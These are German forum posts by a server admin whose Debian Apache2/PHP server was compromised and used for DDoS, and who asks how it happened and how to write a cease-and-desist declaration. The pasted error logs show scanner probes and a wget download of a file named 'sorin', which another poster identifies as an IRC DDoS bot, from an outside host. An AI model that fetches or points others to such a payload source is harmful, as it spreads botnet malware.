Beiträge von nappel4life

  • Apache2 führte DDoS aus

    Zitat von Proyx;34251

    Es ist ein Bot welcher sich zu einem IRC Server verbindet und da Befehle abwartet.Dieser hier wird oft für DDOS eingesetzt.


    Das konnte ich auch schon aus der der Datei entnehmen. Frag mich nur wie sie die Datei ausführen konnten ohne SSH benutzt zu haben, und wie sie diese über apache hochladen konnten, sprich den wget befehl ausführen.

  • Apache2 führte DDoS aus

    Aller anschein nach, führte mein Apache2 einen DDoS aus. Leider bin ich selber schuld. hatte Safe_mode auf off gehabt in der php.ini.


    hier mal meine Error.log


    PHP Warning: Module 'mysql' already loaded in Unknown on line 0
    [Mon May 02 11:29:41 2011] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 configured -- resuming normal operations
    [Mon May 02 13:45:14 2011] [error] [client 93.90.177.140] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
    [Mon May 02 19:45:38 2011] [error] [client 69.162.74.102] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
    [Tue May 03 07:07:47 2011] [error] [client 89.238.185.114] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/w00tw00t.at.blackhats.romanian.anti-sec:)
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/phpMyAdmin
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/pma
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/myadmin
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/MyAdmin
    rm: cannot remove `fail2ban.sock': Operation not permitted
    --20:23:21-- http://czech.altervista.org/sorin
    => `sorin'
    Resolving czech.altervista.org... 46.4.73.74
    Connecting to czech.altervista.org|46.4.73.74|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 28,643 (28K) [text/plain]


    0K .......... .......... ....... 100% 3.35 MB/s


    20:23:21 (3.35 MB/s) - `sorin' saved [28643/28643]


    Für mich stellt sich die Frage wie konnte er eine datei mit übern Apache hochladen und ausführen?

  • Unterlassungserklärung

    Ohman, heisst das ich soll mir jetzt einen Anwalt hinzuziehen wegen so einer Erklärung?
    Was passiert wenn ich keine abgebe und den Server kündige und diesen gesperrt lasse?
    Traffic hat er ja laut VCP nicht wirklich verursacht.
    Werde auch keinen Indianer vorerst installieren, brauch ich nicht wirklich atm.

  • Unterlassungserklärung

    Einen Indianer der anscheinend offen war. Es wurde ein Stealth shell bot geladen.
    Hier meine error.log
    [Mon May 02 11:29:41 2011] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 configured -- resuming normal operations
    [Mon May 02 13:45:14 2011] [error] [client 93.90.177.140] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
    [Mon May 02 19:45:38 2011] [error] [client 69.162.74.102] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
    [Tue May 03 07:07:47 2011] [error] [client 89.238.185.114] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/w00tw00t.at.blackhats.romanian.anti-sec:)
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/phpMyAdmin
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/pma
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/myadmin
    [Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/MyAdmin
    rm: cannot remove `fail2ban.sock': Operation not permitted
    --20:23:21-- http://czech.altervista.org/sorin
    => `sorin'
    Resolving czech.altervista.org... 46.4.73.74
    Connecting to czech.altervista.org|46.4.73.74|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 28,643 (28K) [text/plain]


    0K .......... .......... ....... 100% 3.35 MB/s


    20:23:21 (3.35 MB/s) - `sorin' saved [28643/28643]

  • Unterlassungserklärung

    Nachdem mein Vserver gesperrt wurde, soll ich jetzt eine Unterlassungserklärung schreiben. Hat jemand eine Vorlage für mich? Ich möchte aber auch keine Allgemeine schreiben, die gleich alles abdeckt, bin ja nicht doof :D
    Abgesehen davon ist es meine erste Unterlassungserklärung in all den Jahren in denen ich einen Linux-Server besitze.


    Da es sich um einen Bug in Apache2 handelte, sollte sich die Erklärung auch auf diesem bzw. in dieser Richtung beziehen.


    Hoffe ihr könnt mir helfen


    PS: Checkt mal eure Apache2 logs :D